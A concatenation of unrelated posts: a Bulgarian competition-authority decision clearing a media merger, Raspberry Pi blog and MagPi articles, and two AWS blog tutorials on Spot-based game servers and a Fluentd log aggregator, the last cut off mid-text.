Придобиващата контрол група извършва разнообразни дейности на територията на страната, като участва на множество пазари в различни области. Придобиваното предприятие и дружествата под негов контрол оперират на пазари в областта на медиите (телевизионни, печатни и интернет). Известна връзка между техните дейности е налице по отношение на пазара на телевизионно съдържание и по-точно в сегмента придобиване на права за разпространение, на който оперира придобиваното предприятие „Нова Броудкастинг Груп“АД и дружеството „Футбол Про Медия“ ЕООД
от групата на придобиващия контрол „Адванс Медиа Груп” ЕАД.
„Футбол Про Медиа“ ЕООД има сключени договори, както следва:
(…..)* Въз основа на тези договори, (…..). От гореизложеното може да се направи извод, че дружеството „Футбол Про Медиа“ ЕООД извършва дейност, свързана с (…..) права за телевизионно разпространение. Групата на „Нова“, също създава и купува телевизионно съдържание.
Следователно, сделката ще окаже въздействие единствено върху пазара на телевизионно съдържание и в частност по отношение на придобиване на права за разпространение ((…..)*), на който е налице известно припокриване между дейностите на участниците в концентрацията.

КЗК отчита факта, че участниците в сделката не са преки
конкуренти на съответния пазар и техните отношения са по вертикала, определящо се от качеството, в което оперира всеки от тях, а именно: „Футбол Про Медия“ ЕООД се явява (…..)* на права, а предприятието – цел е купувач на телевизионни права.
По своето естество правата за излъчване на спортни събития са ексклузивни и е обичайна търговска практика да се притежават от едно предприятие за определен период от време и за определена територия. В разглеждания случай (…..). Изхождайки от анализираните данни, Комисията приема, че на съответния пазар оперират значителен брой търговци на съдържание, от които телевизионните оператори в България купуват правата за разпространение на спортни събития. Наличието на голям брой конкуренти, включително утвърдени на пазара чуждестранни имена, води до извода, че те ще са в състояние да окажат ефективен конкурентен натиск на новата икономическа група и същата няма да е независима от тях в своето търговско поведение. Допълнително, с оглед изискванията на ЗРТ и характеристиките на продукта „телевизионно съдържание”, КЗК намира, че пазарът на телевизионно съдържание се отличава с преодолими бариери и е достъпен за навлизане на нови участници. В своя анализ Комисията взема под внимание и обстоятелството, че (…..).
Предвид изложеното и доколкото предприятията –участници в концентрацията, оперират на различни нива на пазара на телевизионно съдържание, Комисията намира, че нотифицираната сделка няма да промени значително пазарното положение на НБГ
на съответния пазар, респективно няма потенциал да увреди конкурентната среда на него.
Въз основа на извършената оценка може да се заключи, че планираната концентрация не води до създаване или засилване на господстващо положение, което значително да ограничи или възпрепятства ефективната конкуренция на анализирания
съответен пазар. Следователно, нотифицираната сделка не би могла да породи антиконкурентни ефекти и следва да бъде безусловно разрешена при условията на чл. 26, ал. 1 от ЗЗК.

Разрешава концентрацията.

The Raspberry Pi shop, one month in

Post Syndicated from Gordon Hollingworth original https://www.raspberrypi.org/blog/the-raspberry-pi-shop-one-month-in/

Five years ago, I spent my first day working at the original Pi Towers (Starbucks in Cambridge). Since then, we’ve developed a whole host of different products and services which our customers love, but there was always one that we never got around to until now: a physical shop. (Here are opening times, directions and all that good stuff.)

Years ago, my first idea was rather simple: rent a small space for the Christmas month and then open a pop-up shop just selling Raspberry Pis. We didn’t really know why we wanted to do it, but suspected it would be fun! We didn’t expect it to take five years to organise, but last month we opened the first Raspberry Pi store in Cambridge’s Grand Arcade – and it’s a much more complete and complicated affair than that original pop-up idea.

Given that we had access to a bunch of Raspberry Pis, we thought that we should use some of them to get some timelapse footage of the shop being set up.

Raspberry Pi Shop Timelapse

Uploaded by Raspberry Pi on 2019-03-22.

The idea behind the shop is to reach an audience that wouldn’t necessarily know about Raspberry Pi, so its job is to promote and display the capabilities of the Raspberry Pi computer and ecosystem. But there’s also plenty in there for the seasoned Pi hacker: we aim to make sure there’s something for you whatever your level of experience with computing is.

Inside the shop you’ll find a set of project centres. Each one contains a Raspberry Pi project tutorial or example that will help you understand one advantage of the Raspberry Pi computer, and walk you through getting started with the device. We start with a Pi running Scratch to control a GPIO, turning on and off an LED. Another demos a similar project in Python, reading a push button and lighting three LEDs (can you guess what colour the three LEDs are?) –  you can also see project centres based around Kodi and RetroPi demonstrating our hardware (the TV-HAT and the Pimoroni Picade console), and an area demonstrating the various Raspberry Pi computer options.

store front

There is a soft seating area, where you can come along, sit and read through the Raspberry Pi books and magazines, and have a chat with the shop staff.  Finally we’ve got shelves of stock with which you can fill yer boots. This is not just Raspberry Pi official products, but merchandise from all of the ecosystem, totalling nearly 300 different lines (with more to come). Finally, we’ve got the Raspberry Pi engineering desk, where we’ll try to answer even the most complex of your questions.

Come along, check out the shop, and give us your feedback. Who knows – maybe you’ll find some official merchandise you can’t buy anywhere else!

The post The Raspberry Pi shop, one month in appeared first on Raspberry Pi.

Win a Raspberry Pi 3B+ and signed case this Pi Day 2019

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/win-raspberry-pi-3b-pi-day/

Happy Pi Day everyone

What is Pi Day, we hear you ask? It’s the day where countries who display their date as month/day/year celebrate the first three digits of today displaying Pi, or 3.14.2019 to be exact.

In celebration of Pi Day, we’re running a Raspberry Pi 3B+ live stream on YouTube. Hours upon hours of our favourite 3B+ in all it’s glorious wonderment.

PI DAY 2019

Celebrate Pi Day with us by watching this Pi

At some point today, we’re going to add a unique hashtag to that live stream, and anyone who uses said hashtag across Instagram and/or Twitter* before midnight tonight (GMT) will be entered into a draw to win a Raspberry Pi Model 3 B+ and an official case, the latter of which will be signed by Eben Upton himself.

Raspberry Pi - PI Day 2019

So sit back, relax, and enjoy the most pointless, yet wonderful, live stream to ever reach the shores of YouTube!

*For those of you who don’t have a Twitter or Instagram account, you can also comment below with the hashtag when you see it.

The post Win a Raspberry Pi 3B+ and signed case this Pi Day 2019 appeared first on Raspberry Pi.

Play Heverlee’s Sjoelen and win beer

Post Syndicated from Rob Zwetsloot original https://www.raspberrypi.org/blog/play-heverlees-sjoelen-win-beer/

Chances are you’ve never heard of the Dutch table shuffleboard variant Sjoelen. But if you have, then you’ll know it has a basic premise – to slide wooden pucks into a set of four scoring boxes – but some rather complex rules.

Sjoelen machine

Uploaded by Grant Gibson on 2018-07-10.

Sjoelen

It may seem odd that a game which relies so much on hand-eye coordination and keeping score could be deemed a perfect match for a project commissioned by a beer brand. Yet Grant Gibson is toasting success with his refreshing interpretation of Sjoelen, having simplified the rules and incorporated a Raspberry Pi to serve special prizes to the winners.

“Sjoelen’s traditional scoring requires lots of addition and multiplication, but our version simply gives players ten pucks and gets them to slide three through any one of the four gates within 30 seconds,” Grant explains.

As they do this, the Pi (a Model 3B) keeps track of how many pucks are sliding through each gate, figures how much time the player has left, and displays a winning message on a screen. A Logitech HD webcam films the player in action, so bystanders can watch their reactions as they veer between frustration and success.

Taking the plunge

Grant started the project with a few aims in mind: “I wanted something that could be transported in a small van and assembled by a two-person team, and I wanted it to have a vintage look.” Inspired by pinball tables, he came up with a three-piece unit that could be flat-packed for transport, then quickly assembled on site. The Pi 3B proved a perfect component.

Grant has tended to use full-size PCs in his previous builds, but he says the Pi allowed him to use less complex software, and less hardware to control input and output. He used Python for the input and output tasks and to get the Pi to communicate with a full-screen Chromium browser, via JSON, in order to handle the scoring and display tasks in JavaScript.

“We used infrared (IR) sensors to detect when a puck passed through the gate bar to score a point,” Grant adds. “Because of the speed of the pucks, we had to poll each of the four IR sensors over 100 times per second to ensure that the pucks were always detected. Optimising the Python code to run fast enough, whilst also leaving enough processing power to run a full-screen web browser and HD webcam, was definitely the biggest software challenge on this project.”

Bottoms up

The Raspberry Pi’s GPIO pins are used to trigger the dispensing of a can of Heverlee beer to the winner. These are stocked inside the machine, but building the vending mechanism was a major headache, since it needed to be lightweight and compact, and to keep the cans cool.

No off-the-shelf vending unit offered a solution, and Grant’s initial attempts with stepper motors and clear laser-cut acrylic gears proved disastrous. “After a dozen successful vends, the prototype went out of alignment and started slicing through cans, creating a huge frothy fountain of beer. Impressive to watch, but not a great mix with electronics,” Grant laughs.

Instead, he drew up a final design that was laser‑cut from poplar plywood. “It uses automotive central locking motors to operate a see-saw mechanism that serve the cans. A custom Peltier-effect heat exchanger, and a couple of salvaged PC fans, keep the cans cool inside the machine,” reveals Grant.

“I’d now love to make a lightweight version sometime, perhaps with a folding Sjoelen table and pop-up scoreboard screen, that could be carried by one person,” he adds. We’d certainly drink to that.

More from The MagPi magazine

Get your copy now from the Raspberry Pi Press store, major newsagents in the UK, or Barnes & Noble, Fry’s, or Micro Center in the US. Or, download your free PDF copy from The MagPi magazine website.

MagPi 79 cover

Subscribe now

Subscribe to The MagPi on a monthly, quarterly, or twelve-monthly basis to save money against newsstand prices!

Twelve-month print subscribers get a free Raspberry Pi 3A+, the perfect Raspberry Pi to try your hand at some of the latest projects covered in The MagPi magazine.

The post Play Heverlee’s Sjoelen and win beer appeared first on Raspberry Pi.

Running your game servers at scale for up to 90% lower compute cost

Post Syndicated from Roshni Pary original https://aws.amazon.com/blogs/compute/running-your-game-servers-at-scale-for-up-to-90-lower-compute-cost/

This post is contributed by Yahav Biran, Chad Schmutzer, and Jeremy Cowan, Solutions Architects at AWS

Many successful video games such Fortnite: Battle Royale, Warframe, and Apex Legends use a free-to-play model, which offers players access to a portion of the game without paying. Such games are no longer low quality and require premium-like quality. The business model is constrained on cost, and Amazon EC2 Spot Instances offer a viable low-cost compute option. The casual multiplayer games naturally fit the Spot offering. With the orchestration of Amazon EKS containers and the mechanism available to minimize the player impact and optimize the cost when running multiplayer game-servers workloads, both casual and hardcore multiplayer games fit the Spot Instance offering.

Spot Instances offer spare compute capacity available in the AWS Cloud at steep discounts compared to On-Demand Instances. Spot Instances enable you to optimize your costs and scale your application’s throughput up to 10 times for the same budget. Spot Instances are best suited for fault-tolerant workloads. Multiplayer game-servers are no exception: a game-server state is updated using real-time player inputs, which makes the server state transient. Game-server workloads can be disposable and take advantage of Spot Instances to save up to 90% on compute cost. In this blog, we share how to architect your game-server workloads to handle interruptions and effectively use Spot Instances.

Characteristics of game-server workloads

Simply put, multiplayer game servers spend most of their life updating current character position and state (mostly animation). The rest of the time is spent on image updates that result from combat actions, moves, and other game-related events. More specifically, game servers’ CPUs are busy doing network I/O operations by accepting client positions, calculating the new game state, and multi-casting the game state back to the clients. That makes a game server workload a good fit for general-purpose instance types for casual multiplayer games and, preferably, compute-optimized instance types for the hardcore multiplayer games.

AWS provides a wide variety for both compute-optimized (C5 and C4) and general-purpose (M5) instance types with Amazon EC2 Spot Instances. Because capacities fluctuate independently for each instance type in an Availability Zone, you can often get more compute capacity for the same price when using a wide range of instance types. For more information on Spot Instance best practices, see Getting Started with Amazon EC2 Spot Instances

One solution that customers use for running dedicated game-servers is Amazon GameLift. This solution deploys a fleet of Amazon GameLift FleetIQ and Spot Instances in an AWS Region. FleetIQ places new sessions on game servers based on player latencies, instance prices, and Spot Instance interruption rates so that you don’t need to worry about Spot Instance interruptions. For more information, see Reduce Cost by up to 90% with Amazon GameLift FleetIQ and Spot Instances on the AWS Game Tech Blog.

In other cases, you can use game-server deployment patterns like containers-based orchestration (such as Kubernetes, Swarm, and Amazon ECS) for deploying multiplayer game servers. Those systems manage a large number of game-servers deployed as Docker containers across several Regions. The rest of this blog focuses on this containerized game-server solution. Containers fit the game-server workload because they’re lightweight, start quickly, and allow for greater utilization of the underlying instance.

Why use Amazon EC2 Spot Instances?

A Spot Instance is the choice to run a disposable game server workload because of its built-in two-minute interruption notice that provides graceful handling. The two-minute termination notification enables the game server to act upon interruption. We demonstrate two examples for notification handling through Instance Metadata and Amazon CloudWatch. For more information, see “Interruption handling” and “What if I want my game-server to be redundant?” segments later in this blog.

Spot Instances also offer a variety of EC2 instances types that fit game-server workloads, such as general-purpose and compute-optimized (C4 and C5). Finally, Spot Instances provide low termination rates. The Spot Instance Advisor can help you choose a good starting point for determining which instance types have lower historical interruption rates.

Interruption handling

Avoiding player impact is key when using Spot Instances. Here is a strategy to avoid player impact that we apply in the proposed reference architecture and code examples available at Spotable Game Server on GitHub. Specifically, for Amazon EKS, node drainage requires draining the node via the kubectl drain command. This makes the node unschedulable and evicts the pods currently running on the node with a graceful termination period (terminationGracePeriodSeconds) that might impact the player experience. As a result, pods continue to run while a signal is sent to the game to end it gracefully.

Node drainage

Node drainage requires an agent pod that runs as a DaemonSet on every Spot Instance host to pull potential spot interruption from Amazon CloudWatch or instance metadata. We’re going to use the Instance Metadata notification. The following describes how termination events are handled with node drainage:

  1. Launch the game-server pod with a default of 120 seconds (terminationGracePeriodSeconds). As an example, see this deploy YAML file on GitHub.
  2. Provision a worker node pool with a mixed instances policy of On-Demand and Spot Instances. It uses the Spot Instance allocation strategy with the lowest price. For example, see this AWS CloudFormation template on GitHub.
  3. Use the Amazon EKS bootstrap tool (/etc/eks/bootstrap.sh in the recommended AMI) to label each node with its instances lifecycle, either nDemand or Spot. For example:
    • OnDemand: “–kubelet-extra-args –node labels=lifecycle=ondemand,title=minecraft,region=uswest2”
    • Spot: “–kubelet-extra-args –node-labels=lifecycle=spot,title=minecraft,region=uswest2”
  4. A daemon set deployed on every node pulls the termination status from the instance metadata endpoint. When a termination notification arrives, the `kubectl drain node` command is executed, and a SIGTERM signal is sent to the game-server pod. You can see these commands in the batch file on GitHub.
  5. The game server keeps running for the next 120 seconds to allow the game to notify the players about the incoming termination.
  6. No new game-server is scheduled on the node to be terminated because it’s marked as unschedulable.
  7. A notification to an external system such as a matchmaking system is sent to update the current inventory of available game servers.

Optimization strategies for Kubernetes specifications

This section describes a few recommended strategies for Kubernetes specifications that enable optimal game server placements on the provisioned worker nodes.

  • Use single Spot Instance Auto Scaling groups as worker nodes. To accommodate the use of multiple Auto Scaling groups, we use Kubernetes nodeSelector to control the game-server scheduling on any of the nodes in any of the Spot Instance–based Auto Scaling groups.
    nodeSelector:
         lifecycle: spot
            title: your game title

  • The lifecycle label is populated upon node creation through the AWS CloudFormation template in the following section:
    BootstrapArgumentsForSpotFleet:
    	Description: Sets Node Labels to set lifecycle as Ec2Spot
    	    Default: "--kubelet-extra-args --node-labels=lifecycle=spot,title=minecraft,region=uswest2"
    	
    	    Type: String

  • You might have a case where the incoming player actions are served by UDP and masking the interruption from the player is required. Here, the game-server allocator (a Kubernetes scheduler for us) schedules more than one game server as target upstream servers behind a UDP load balancer that multicasts any packet received to the set of game servers. After the scheduler terminates the game server upon node termination, the failover occurs seamlessly. For more information, see “What if I want my game-server to be redundant?” later in this blog.

Reference architecture

The following architecture describes an instance mix of On-Demand and Spot Instances in an Amazon EKS cluster of multiplayer game servers. Within a single VPC, control plane node pools (Master Host and Storage Host) are highly available and thus run On-Demand Instances. The game-server hosts/nodes uses a mix of Spot and On-Demand Instances. The control plane, the API server is accessible via an Amazon Elastic Load Balancing Application Load Balancer with a preconfigured allowed list.

What if I want my game server to be redundant?

A game server is a sessionful workload, but it traditionally runs as a single dedicated game server instance with no redundancy. For game servers that use TCP as the transport network layer, AWS offers Network Load Balancers as an option for distributing player traffic across multiple game servers’ targets. Currently, game servers that use UDP don’t have similar load balancer solutions that add redundancy to maintain a highly available game server.

This section proposes a solution for the case where game servers deployed as containerized Amazon EKS pods use UDP as the network transport layer and are required to be highly available. We’re using the UDP load balancer because of the Spot Instances, but the choice isn’t limited to when you’re using Spot Instances.

The following diagram shows a reference architecture for the implementation of a UDP load balancer based on Amazon EKS. It requires a setup of an Amazon EKS cluster as suggested above and a set of components that simulate architecture that supports multiplayer game services. For example, this includes game-server inventory that captures the running game-servers, their status, and allocation placement.The Amazon EKS cluster is on the left, and the proposed UDP load-balancer system is on the right. A new game server is reported to an Amazon SQS queue that persists in an Amazon DynamoDB table. When a player’s assignment is required, the match-making service queries an API endpoint for an optimal available game server through the game-server inventory that uses the DynamoDB tables.

The solution includes the following main components:

  • The game server (see mockup-udp-server at GitHub). This is a simple UDP socket server that accepts a delta of a game state from connected players and multicasts the updated state based on pseudo computation back to the players. It’s a single threaded server whose goal is to prove the viability of UDP-based load balancing in dedicated game servers. The model presented here isn’t limited to this implementation. It’s deployed as a single-container Kubernetes pod that uses hostNetwork: true for network optimization.
  • The load balancer (udp-lb). This is a containerized NGINX server loaded with the stream module. The load balance upstream set is configured upon initialization based on the dedicated game-server state that is stored in the DynamoDB table game-server-status-by-endpoint. Available load balancer instances are also stored in a DynamoDB table, lb-status-by-endpoint, to be used by core game services such as a matchmaking service.
  • An Amazon SQS queue that captures the initialization and termination of game servers and load balancers instances deployed in the Kubernetes cluster.
  • DynamoDB tables that persist the state of the cluster with regards to the game servers and load balancer inventory.
  • An API operation based on AWS Lambda (game-server-inventory-api-lambda) that serves the game servers and load balancers for an updated list of resources available. The operation supports /get-available-gs needed for the load balancer to set its upstream target game servers. It also supports /set-gs-busy/{endpoint} for labeling already claimed game servers from the available game servers inventory.
  • A Lambda function (game-server-status-poller-lambda) that the Amazon SQS queue triggers and that populates the DynamoDB tables.

Scheduling mechanism

Our goal in this example is to reduce the chance that two game servers that serve the same load-balancer game endpoint are interrupted at the same time. Therefore, we need to prevent the scheduling of the same game servers (mockup-UDP-server) on the same host. This example uses advanced scheduling in Kubernetes where the pod affinity/anti-affinity policy is being applied.

We define two soft labels, mockup-grp1 and mockup-grp2, in the podAffinity section as follows:

      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
            - labelSelector:
                matchExpressions:
                  - key: "app"
                    operator: In
                    values:
                      - mockup-grp1
              topologyKey: "kubernetes.io/hostname"

The requiredDuringSchedulingIgnoredDuringExecution tells the scheduler that the subsequent rule must be met upon pod scheduling. The rule says that pods that carry the value of key: “app” mockup-grp1 will not be scheduled on the same node as pods with key: “app” mockup-grp2 due to topologyKey: “kubernetes.io/hostname”.

When a load balancer pod (udp-lb) is scheduled, it queries the game-server-inventory-api endpoint for two game-server pods that run on different nodes. If this request isn’t fulfilled, the load balancer pod enters a crash loop until two available game servers are ready.

Try it out

We published two examples that guide you on how to build an Amazon EKS cluster that uses Spot Instances. The first example, Spotable Game Server, creates the cluster, deploys Spot Instances, Dockerizes the game server, and deploys it. The second example, Game Server Glutamate, enhances the game-server workload and enables redundancy as a mechanism for handling Spot Instance interruptions.

Conclusion

Multiplayer game servers have relatively short-lived processes that last between a few minutes to a few hours. The current average observed life span of Spot Instances in US and EU Regions ranges between a few hours to a few days, which makes Spot Instances a good fit for game servers. Amazon GameLift FleetIQ offers native and seamless support for Spot Instances, and Amazon EKS offers mechanisms to significantly minimize the probability of interrupting the player experience. This makes the Spot Instances an attractive option for not only casual multiplayer game server but also hardcore game servers. Game studios that use Spot Instances for multiplayer game server can save up to 90% of the compute cost, thus benefiting them as well as delighting their players.

Building a scalable log solution aggregator with AWS Fargate, Fluentd, and Amazon Kinesis Data Firehose

Post Syndicated from Anuneet Kumar original https://aws.amazon.com/blogs/compute/building-a-scalable-log-solution-aggregator-with-aws-fargate-fluentd-and-amazon-kinesis-data-firehose/

This post is contributed by Wesley Pettit, Software Dev Engineer, and a maintainer of the Amazon ECS CLI.

Modern distributed applications can produce gigabytes of log data every day. Analysis and storage is the easy part. From Amazon S3 to Elasticsearch, many solutions are available. The hard piece is reliably aggregating and shipping logs to their final destinations.

In this post, I show you how to build a log aggregator using AWS Fargate, Amazon Kinesis Data Firehose, and Fluentd. This post is unrelated to the AWS effort to support Fluentd to stream container logs from Fargate tasks. Follow the progress of that effort on the AWS container product roadmap.

Solution overview

Fluentd forms the core of my log aggregation solution. It is an open source project that aims to provide a unified logging layer by handling log collection, filtering, buffering, and routing. Fluentd is widely used across cloud platforms and was adopted by the Cloud Native Computing Foundation (CNCF) in 2016.

AWS Fargate provides a straightforward compute environment for the Fluentd aggregator. Kinesis Data Firehose streams the logs to their destinations. It batches, compresses, transforms, and encrypts the data before loading it. ECS minimizes the amount of storage used at the destination and increases security.

The log aggregator that I detail in this post is generic and can be used with any type of application. However, for simplicity, I focus on how to use the aggregator with Amazon Elastic Container Service (ECS) tasks and services.

Building a Fluentd log aggregator on Fargate that streams to Kinesis Data Firehose

 

The diagram describes the architecture that you are going to implement. A Fluentd aggregator runs as a service on Fargate behind a Network Load Balancer. The service uses Application Auto Scaling to dynamically adjust to changes in load.

Because the load balancer DNS can only be resolved in the VPC, the aggregator is a private log collector that can accept logs from any application in the VPC. Fluentd streams the logs to Kinesis Data Firehose, which dumps them in S3 and Amazon ElasticSearch Service (Amazon ES).

Not all logs are of equal importance. Some require real time analytics, others simply need long-term storage so that they can be analyzed if needed. In this post, applications that log to Fluentd are split up into frontend and backend.

Frontend applications are user-facing and need rich functionality to query and analyze the data present in their logs to obtain insights about users. Therefore, frontend application logs are sent to Amazon ES.

In contrast, backend services do not need the same level of analytics, so their logs are sent to S3. These logs can be queried using Amazon Athena, or they can be downloaded and ingested into other analytics tools as needed.

Each application tags its logs, and Fluentd sends the logs to different destinations based on the tag. Thus, the aggregator can determine whether a log message is from a backend or frontend application. Each log message gets sent to one of two Kinesis Data Firehose streams:

  • One streams to S3
  • One streams to an Amazon ES cluster

Running the aggregator on Fargate makes maintaining this service easy, and you don’t have to worry about provisioning or managing instances. This makes scaling the aggregator simple. You do not have to manage an additional Auto Scaling group for instances.

Aggregator performance and throughput

Before I walk you through how to deploy the Fluentd aggregator in your own VPC, you should know more about its performance.

I performed extensive real world testing with this aggregator set up, to test its limits. Each task in the aggregator service can handle at least at least 9 MB/s of log traffic, and at least 10,000 log messages/second. These are comfortable lower bounds for the aggregator’s performance. I recommend using these numbers to provision your aggregator service based upon your expected throughput for log traffic.

While this aggregator set up includes dynamic scaling, you must carefully choose the minimum size of the service. This is because dynamic scaling with Fluentd is complicated.

The Fluentd aggregator accepts logs via TCP connections, which are balanced across the instances of the service by the Network Load Balancer. However, these TCP connections are long-lived, and the load balancer only distributes new TCP connections. Thus, when the aggregator scales up in response to increased load, the new Fargate tasks can not help with any of the existing load. The new tasks can only take new TCP connections. This also means that older tasks in the aggregator tend to accumulate connections with time. This is an important limitation to keep in mind.

For the Docker logging driver for Fluentd (which can be used by ECS tasks to send logs to the aggregator), a single TCP connection is made when each container starts. This connection is held open as long as possible. A TCP connection can remain open as long as data is still being sent over it, and there are no network connectivity issues. The only way to guarantee that there are new TCP connections is to launch new containers.

Dynamic scaling can only help in cases where there are spikes in log traffic and new TCP connections. If you are using the aggregator with ECS tasks, dynamic scaling is only useful if spikes in log traffic come from launching new containers. On the other hand, if spikes in log traffic come from existing containers that periodically increase their log output, then dynamic scaling can’t help.

Therefore, configure the minimum number of tasks for the aggregator based upon the maximum throughput that you expect from a stable population of containers. For example, if you expect 45 MB/s of log traffic, then I recommend setting the minimum size of the aggregator service to five tasks, so that each one gets 9 MB/s of traffic.

For reference, here is the resource utilization that I saw for a single aggregator task under a variety of loads. The aggregator is configured with four vCPU and 8 GB of memory as its task size. As you can see, CPU usage scales linearly with load, so dynamic scaling is configured based on CPU usage.

Performance of a single aggregator task

Keep in mind that this data does not represent a guarantee, as your performance may differ. I recommend performing real-world testing using logs from your applications so that you can tune Fluentd to your specific needs.

As a warning, one thing to watch out for is messages in the Fluentd logs that mention retry counts:

2018-10-24 19:26:54 +0000 [warn]: #0 [output_kinesis_frontend] Retrying to request batch. Retry count: 1, Retry records: 250, Wait seconds 0.35
2018-10-24 19:26:54 +0000 [warn]: #0 [output_kinesis_frontend] Retrying to request batch. Retry count: 2, Retry records: 125, Wait seconds 0.27
2018-10-24 19:26:57 +0000 [warn]: #0 [output_kinesis_frontend] Retrying to request batch. Retry count: 1, Retry records: 250, Wait seconds 0.30

In my experience, these warnings always came up whenever I was hitting Kinesis Data Firehose API limits. Fluentd can accept high volumes of log traffic, but if it runs into Kinesis Data Firehose limits, then the data is buffered in memory.

If this state persists for a long time, data is eventually lost when the buffer reaches its max size. To prevent this problem, either increase the number of Kinesis Data Firehose delivery streams in use or request a Kinesis Data Firehose limit increase.

Aggregator reliability

In normal use, I didn’t see any dropped or duplicated log messages. A small amount of log data loss occurred when tasks in the service were stopped. This happened when the service was scaling down, and during deployments to update the Fluentd configuration.

When a task is stopped, it is sent SIGTERM, and then after a 30-second timeout, SIGKILL. When Fluentd receives the SIGTERM, it makes a single attempt to send all logs held in its in-memory buffer to their destinations. If this single attempt fails, the logs are lost. Therefore, log loss can be minimized by over-provisioning the aggregator, which reduces the amount of data buffered by each aggregator task.

Also, it is important to stay well within your Kinesis Data Firehose API limits. That way, Fluentd has the best chance of sending all the data to Kinesis Data Firehose during that single attempt.

To test the reliability of the aggregator, I used applications hosted on ECS that created several megabytes per second of log traffic. These applications inserted special ‘tracer’ messages into their normal log output. By querying for these tracer messages at the log storage destination, I was able determine how many messages were lost or duplicated.

These tracer logs were produced at a rate of 18 messages per second. During a deployment to the aggregator service (which stops all the existing tasks after starting new ones), 2.67 tracer messages were lost on average, and 11.7 messages were duplicated.

There are multiple ways to think about this data. If I ran one deployment during an hour, then 0.004% of my log data would be lost during that period, making the aggregator 99.996% reliable. In my experience, stopping a task only causes log loss during a short time slice of about 10 seconds.

Here’s another way to look at this. Every time that a task in my service was stopped (either due to a deployment or the service scaling in), only 1.5% of the logs received by that task in the 10-second period were lost on average.

As you can see, the aggregator is not perfect, but it is fairly reliable. Remember that logs were only dropped when aggregator tasks were stopped. In all other cases, I never saw any log loss. Thus, the aggregator provides a sufficient reliability guarantee that it can be trusted to handle the logs of many production workloads.

Deploying the aggregator

Here’s how to deploy the log aggregator in your own VPC.

1.     Create the Kinesis Data Firehose delivery streams.

2.     Create a VPC and network resources.

3.     Configure Fluentd.

4.     Build the Fluentd Docker image.

5.     Deploy the Fluentd aggregator on Fargate.

6.     Configure ECS tasks to send logs to the aggregator.

Create the Kinesis Data Firehose delivery streams

For the purposes of this post, assume that you have already created an Elasticsearch domain and S3 bucket that can be used as destinations.

Create a delivery stream that sends to Amazon ES, with the following options:

  • For Delivery stream name, type “elasticsearch-delivery-stream.”
  • For Source, choose Direct Put or other sources.
  • For Record transformation and Record format conversion, enable them to change the format of your log data before it is sent to Amazon ES.
  • For Destination, choose Amazon Elasticsearch Service.
  • If needed, enable S3 backup of records.
  • For IAM Role, choose Create new or navigate to the Kinesis Data Firehose IAM role creation wizard.
  • For the IAM policy, remove any statements that do not apply to your delivery stream.

All records sent through this stream are indexed under the same Elasticsearch type, so it’s important that all of the log records be in the same format. Fortunately, Fluentd makes this easy. For more information, see the Configure Fluentd section in this post.

Follow the same steps to create the delivery stream that sends to S3. Call this stream “s3-delivery-stream,” and select your S3 bucket as the destination.

Create a VPC and network resources

Download the ecs-refarch-cloudformation/infrastructure/vpc.yaml AWS CloudFormation template from GitHub. This template specifies a VPC with two public and two private subnets spread across two Availability Zones. The Fluentd aggregator run in the private subnets, along with any other services that should not be accessible outside the VPC. Your backend services would likely run here as well.

The template configures a NAT gateway that allows services in the private subnets to make calls to endpoints on the internet. It allows one-way communication out of the VPC, but blocks incoming traffic. This is important. While the aggregator service should only be accessible in your VPC, it does need to make calls to the Kinesis Data Firehose API endpoint, which lives outside of your VPC.

Deploy the template with the following command:

aws cloudformation deploy --template-file vpc.yaml \
--stack-name vpc-with-nat \
--parameter-overrides EnvironmentName=aggregator-service-infrastructure

Configure Fluentd

The Fluentd aggregator collects logs from other services in your VPC. Assuming that all these services are running in Docker containers that use the Fluentd docker log driver, each log event collected by the aggregator is in the format of the following example:

{
"source": "stdout",
"log": "122.116.50.70 - Corwin8644 264 [2018-10-31T21:31:59Z] \"POST /activate\" 200 19886",
"container_id": "6d33ade920a96179205e01c3a17d6e7f3eb98f0d5bb2b494383250220e7f443c",
"container_name": "/ecs-service-2-apache-d492a08f9480c2fcca01"
}

This log event is from an Apache server running in a container on ECS. The line that the server logged is captured in the log field, while source, container_id, and container_name are metadata added by the Fluentd Docker logging driver.

As I mentioned earlier, all log events sent to Amazon ES from the delivery stream must be in the same format. Furthermore, the log events must be JSON-formatted so that they can be converted into a Elasticsearch type. The Fluentd Docker logging driver satisfies both of these requirements.

If you have applications that emit Fluentd logs in different formats, then you could use a Lambda function in the delivery stream to transform all of the log records into a common format.

Alternatively, you could have a different delivery stream for each application type and log format and each log format could correspond to a different type in the Amazon ES domain. For simplicity, this post assumes that all of the frontend and backend services run on ECS and use the Fluentd Docker logging driver.

Now create the Fluentd configuration file, fluent.conf:

<system>
workers 4
</system>

<source>
@type  forward
@id    input1
@label @mainstream
port  24224
</source>

# Used for docker health check
<source>
@type http
port 8888
bind 0.0.0.0
</source>

# records sent for health checking won't be forwarded anywhere
<match health*>
@type null
</match>

<label @mainstream>
<match frontend*>
@type kinesis_firehose
@id   output_kinesis_frontend
region us-west-2
delivery_stream_name elasticsearch-delivery-stream
<buffer>
flush_interval 1
chunk_limit_size 1m
flush_thread_interval 0.1
flush_thread_burst_interval 0.01
flush_thread_count 15
total_limit_size 2GB
</buffer>
</match>
<match backend*>
@type kinesis_firehose
@id   output_kinesis_backend
region us-west-2
delivery_stream_name s3-delivery-stream
<buffer>
flush_interval 1
chunk_limit_size 1m
flush_thread_interval 0.1
flush_thread_burst_interval 0.01
flush_thread_count 15
total_limit_size 2GB
</buffer>
</match>
</label>

This file can also be found here, along with all of the code for this post. The first three lines tell Fluentd to use four workers, which means it can use up to 4 CPU cores. You later configure each Fargate task to have four vCPU. The rest of the configuration defines sources and destinations for logs processed by the aggregator.

The first source listed is the main source. All the applications in the VPC forward logs to Fluentd using this source definition. The source tells Fluentd to listen for logs on port 24224. Logs are streamed over tcp connections at this port.

The second source is the http Fluentd plugin, listening on port 8888. This plugin accepts logs over http; however, this is only used for container health checks. Because Fluentd lacks a built-in health check, I’ve created a container health check that sends log messages via curl to the http plugin. The rationale is that if Fluentd can accept log messages, it must be healthy. Here is the command used for the container health check:

curl http://localhost:8888/healthcheck?json=%7B%22log%22%3A+%22health+check%22%7D || exit 1

The query parameter in the URL defines a URL-encoded JSON object that looks like this:

{"log": "health check"}

The container health check inputs a log message of “health check”. While the query parameter in the URL defines the log message, the path, which is /healthcheck, sets the tag for the log message. In Fluentd, log messages are tagged, which allows them to be routed to different destinations.

